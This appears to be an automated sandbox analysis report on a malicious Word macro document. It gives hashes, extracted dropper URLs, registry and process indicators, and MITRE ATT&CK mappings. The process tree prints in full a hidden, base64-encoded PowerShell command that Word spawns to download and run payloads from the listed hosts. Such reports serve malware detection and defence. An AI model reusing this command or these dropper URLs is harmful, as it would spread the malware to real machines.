8e0de460b9fda2be0a5598feaffe9a0faa477f28848503df55aca29e02a5d73f

General

Target

99db04dd333aeb461aeef0a737812483_JaffaCakes118.doc
Size

96KB
MD5

99db04dd333aeb461aeef0a737812483
SHA1

610b769e0f2046a9bd10ecf94f51bf8a00f8ef7c
SHA256

8e0de460b9fda2be0a5598feaffe9a0faa477f28848503df55aca29e02a5d73f
SHA512

1f8d24432c3b3b7123fc183b031ee796953d0dd0d6a6cd59711423d21949e174d7db6a2c14f03c45e53535637f638e69002c978ca35a58b0af9686ce514b6d5a
SSDEEP

1536:aIiQdI1iiguaEdgraY+aggUh/X+jsR4yINs:BiF1tgpEdXX+a4yINs

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://maisbrasilphoto.com.br/dojziJG/

exe.dropper

http://nincom.nl/pzN5/

exe.dropper

http://rehal.jp/fhwO9XG/

exe.dropper

http://rkschmidt.net/rqun/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4252	1236	PowersHeLL.exe	82

Blocklisted process makes network request 4 IoCs

flow	pid	Process
24	4252	PowersHeLL.exe
25	4252	PowersHeLL.exe
30	4252	PowersHeLL.exe
33	4252	PowersHeLL.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4252	PowersHeLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1236	WINWORD.EXE
1236	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4252	PowersHeLL.exe
4252	PowersHeLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4252	PowersHeLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1236	WINWORD.EXE
1236	WINWORD.EXE
1236	WINWORD.EXE
1236	WINWORD.EXE
1236	WINWORD.EXE
1236	WINWORD.EXE
1236	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1236 wrote to memory of 4252	1236	WINWORD.EXE	86
PID 1236 wrote to memory of 4252	1236	WINWORD.EXE	86

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\99db04dd333aeb461aeef0a737812483_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1236
- C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe
  PowersHeLL -WinDowsTyle hidden -e IAAuACgAKABnAGUAVAAtAHYAYQByAEkAQQBCAGwAZQAgACcAKgBtAEQAcgAqACcAKQAuAG4AYQBNAEUAWwAzACwAMQAxACwAMgBdAC0AagBvAEkAbgAnACcAKQAoACAAKAAoACIAewAxADcAfQB7ADEAMAB9AHsANAA3AH0AewAxADIANgB9AHsANwAzAH0AewAzADEAfQB7ADkANAB9AHsAMQAxADUAfQB7ADkAOQB9AHsANQA5AH0AewAxADAAMAB9AHsAOQAwAH0AewAzADcAfQB7ADEAMgA0AH0AewA3ADAAfQB7ADIAMQB9AHsAMAB9AHsAMgA3AH0AewA4ADYAfQB7ADYAMQB9AHsAOQA4AH0AewA1ADUAfQB7ADQAMAB9AHsANwB9AHsAMQAwADYAfQB7ADYANgB9AHsAMwA4AH0AewA1ADYAfQB7ADgAMQB9AHsAMQAxADQAfQB7ADIANgB9AHsANQA3AH0AewA3ADQAfQB7ADEAMgAxAH0AewA3ADYAfQB7ADEAMAA3AH0AewA0ADEAfQB7ADYAMgB9AHsANAA0AH0AewAxADEAMgB9AHsANwA5AH0AewAxADkAfQB7ADYAfQB7ADUAOAB9AHsANwA1AH0AewAxADIAMAB9AHsAMQAyAH0AewA4ADQAfQB7ADEAMQB9AHsAMQA1AH0AewAxADQAfQB7ADEAMQA4AH0AewAxADIANQB9AHsAOAA4AH0AewAxADAAMwB9AHsAMQAxADMAfQB7ADEAMQA5AH0AewA4ADkAfQB7ADcAMQB9AHsANgA5AH0AewA2ADUAfQB7ADQAOAB9AHsAOAA1AH0AewA0ADUAfQB7ADQANgB9AHsAOQA1AH0AewA4ADAAfQB7ADgAMwB9AHsAMgAwAH0AewAxADEAMAB9AHsANQAwAH0AewAxADEAMQB9AHsANwAyAH0AewAxADEANgB9AHsAMQAyADMAfQB7ADEAfQB7ADMAOQB9AHsAMwB9AHsANQA0AH0AewAzADMAfQB7ADUAfQB7ADQAMwB9AHsAMgAzAH0AewAxADAAMgB9AHsAOQB9AHsAOQAzAH0AewA5ADcAfQB7ADUAMgB9AHsANgA4AH0AewA0ADkAfQB7ADEAMgAyAH0AewAzADQAfQB7ADYAMAB9AHsAMQAzAH0AewA1ADEAfQB7ADkAMgB9AHsAMwAyAH0AewA0ADIAfQB7ADMANgB9AHsAOQA2AH0AewAxADgAfQB7ADgANwB9AHsAMQAwADEAfQB7ADUAMwB9AHsAMQAwADUAfQB7ADQAfQB7ADYANAB9AHsAMgB9AHsAMwAwAH0AewA5ADEAfQB7ADIAOAB9AHsANgA3AH0AewA3ADcAfQB7ADEAMQA3AH0AewAxADAAOQB9AHsANgAzAH0AewA4AH0AewAyADkAfQB7ADgAMgB9AHsAMQAwADgAfQB7ADIAMgB9AHsANwA4AH0AewAxADYAfQB7ADIANQB9AHsAMQAwADQAfQB7ADMANQB9AHsAMgA0AH0AIgAgAC0AZgAnACsARwBxACcALAAnAEoAUAAnACwAJwAgAEkAJwAsACcAcAB1AGIAJwAsACcATgBnAFoAMgBjACcALAAnAEcAcQBrAEkAYwBZACcALAAnAGEAcwBpACcALAAnAGwAaQBlAG4AdAA7AEkAJwAsACcALQBJACcALAAnACsAJwAsACcASgAnACwAJwAvACcALAAnAGoAegAnACwAJwBVACcALAAnAGgAdAB0AHAAOgAvAC8AbgBpAG4AJwAsACcAQAAnACwAJwBjAGEAJwAsACcASQAnACwAJwBlAFoAMgBjACgASQBKAFAAYQBzACcALAAnAHIAJwAsACcAcABsAGkAJwAsACcAcQBrACcALAAnAGUAYQBrACcALAAnACgARwAnACwAJwB9ACcALAAnAHQAJwAsACcAMgAxADMAMwAnACwAJwBrAHcARwBxAGsAKwBHAHEAawAtAG8AYgBqAGUAYwB0ACcALAAnACgAJwAsACcAdABlAG0ARwBxAGsAKQAoAEkASgBQAFMARABDACcALAAnAEoAJwAsACcAcQBrAG4ARwBxAGsAKwBHAHEAJwAsACcAbwBWAFIAdAAnACwAJwBjACAAKwAgACcALAAnAFAAJwAsACcAaAB7AH0AJwAsACcAbABWAFIAdABPAGEAZABGAEkAVgBSAHQAJwAsACcAbgBkACcALAAnAFAAbgBzAGEAZABhAHMAZAAuAG4AJwAsACcAZQBuAHYAOgAnACwAJwB0AC4AVwBlAGIAQwAnACwAJwAvAG8AcgBiAGkAcwBpAG4AYwAuACcALAAnAFcAbgAnACwAJwBHAHEAawAgACsAIABJAEoAUABOAFMAQgAgACsAIAAnACwAJwBiAGwAYwBZAGcAUAAvACcALAAnAGMAJwAsACcAaABtAGkAZAB0AC4AJwAsACcAUABuAHMAYQBkAGEAJwAsACcAaAB0AHQAJwAsACcARABDAFgAKQB7AHQAJwAsACcAKQAnACwAJwAuAFoAJwAsACcAKABJAEoAUABhAHMAZgBjACAAaQBuACcALAAnAFYAJwAsACcAbABpACcALAAnAE4AZQAnACwAJwBlAHgAdAAoADEAJwAsACcAKQA7AEkAJwAsACcAbABwAGgAbwAnACwAJwBHAHEAawB0ACcALAAnAFkAWQAnACwAJwBxAGsAKQAgAFMAeQBzAHQAZQAnACwAJwBjAG8AbQAvACcALAAnAGsAZQAnACwAJwAoACkALAAnACwAJwAvAEAAJwAsACcATgBTAEIAIAA9ACAASQBKACcALAAnAEcAJwAsACcAIABJAEoAUABBACcALAAnAGgAdwBPADkAWABHACcALAAnAFkAVQAgAD0AIAAuACgARwBxAGsAbgBlAEcAJwAsACcALwByAGUAaABhAGwALgBqAHAALwBmACcALAAnAFAAUwBEAEMAIAAnACwAJwBkACAAPQAgACYAKABHACcALAAnAEoAUABBAEQAQwAnACwAJwB0AG8ALgBjAG8AbQAuAGIAcgAnACwAJwAgAEcAcQBrAA0ACgBoAHQAdABwACcALAAnAHEAawBJAG4AdgBvAEcAJwAsACcAOwB9ACcALAAnAC8AbQBhAGkAcwBiACcALAAnAHIAcQAnACwAJwAwADAAMAAnACwAJwApACcALAAnAHUAbgAvAEcAcQBrAC4AUwAnACwAJwBpAEoARwAnACwAJwBwADoALwAvAHIAawBzACcALAAnAEcAJwAsACcAZgBjAC4AWgAyAGMAVABvAFMAJwAsACcALwBwAHoAJwAsACcAOgAvACcALAAnAGEAJwAsACcAUABTAEQAQwApADsAJgAnACwAJwAyAGMARAAnACwAJwBHAHEAawBlAEcAcQBrACkAOwBmACcALAAnAGsAZQAnACwAJwBuAGUAdAAvACcALAAnAGwAJwAsACcAbwByAGUAYQBjAGgAJwAsACcAbQAuACcALAAnAGIAagBlAGMARwBxAGsAKwAnACwAJwBHAHEAawApACAAcgAnACwAJwB0AHIAVgBSAHQAaQAnACwAJwBxAGsALgBlAHgARwBxAGsAJwAsACcATgAnACwAJwBjACcALAAnAFIAdAAnACwAJwBKAFAAJwAsACcAOgAvACcALAAnADsAYgByACcALAAnAHEAawArAEcAcQAnACwAJwB0ACgARwBxAGsAQABHAHEAawAnACwAJwA7AEkASgAnACwAJwBAAGgAdAB0AHAAOgAvACcALAAnADUALwBAAGgAJwAsACcAMAAsACAAMgA4ACcALAAnAEcAcQBrACsARwBxAGsAdwAtAG8AJwAsACcAPQAgACcALAAnAHEAawArAEcAcQBrAGsARwAnACwAJwBjAG8AJwAsACcAdAB0AHAAJwAsACcALwBkAG8AJwAsACcAWAAgAD0AJwAsACcAcgB5AHsASQBKACcALAAnAEkAJwAsACcAbwBtADsASQBKAFAAWQAnACwAJwBtAC4AbgBsACcALAAnAHMAJwApACkALgByAEUAcABsAGEAYwBFACgAKABbAEMAaABBAHIAXQA4ADYAKwBbAEMAaABBAHIAXQA4ADIAKwBbAEMAaABBAHIAXQAxADEANgApACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBoAEEAcgBdADkANgApAC4AcgBFAHAAbABhAGMARQAoACcAWgAyAGMAJwAsAFsAcwBUAHIAaQBOAGcAXQBbAEMAaABBAHIAXQAzADQAKQAuAHIARQBwAGwAYQBjAEUAKAAoAFsAQwBoAEEAcgBdADcAMwArAFsAQwBoAEEAcgBdADkAOQArAFsAQwBoAEEAcgBdADgAOQApACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBoAEEAcgBdADkAMgApAC4AcgBFAHAAbABhAGMARQAoACcASQBKAFAAJwAsACcAJAAnACkALgByAEUAcABsAGEAYwBFACgAJwBHAHEAawAnACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBoAEEAcgBdADMAOQApACAAKQA=
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD8522.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_occefezm.syq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1236-9-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-44-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-4-0x00007FF83386D000-0x00007FF83386E000-memory.dmp

Filesize
4KB

Download
memory/1236-5-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-6-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-7-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-10-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-0-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-8-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-13-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-43-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-15-0x00007FF7F17F0000-0x00007FF7F1800000-memory.dmp

Filesize
64KB

Download
memory/1236-14-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-11-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-16-0x00007FF7F17F0000-0x00007FF7F1800000-memory.dmp

Filesize
64KB

Download
memory/1236-42-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-1-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-39-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-12-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-574-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-3-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-571-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-573-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-69-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-70-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-2-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-548-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-549-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-550-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/1236-570-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/1236-572-0x00007FF7F3850000-0x00007FF7F3860000-memory.dmp

Filesize
64KB

Download
memory/4252-63-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download
memory/4252-55-0x0000026C76AA0000-0x0000026C76AC2000-memory.dmp

Filesize
136KB

Download
memory/4252-45-0x00007FF8337D0000-0x00007FF8339C5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads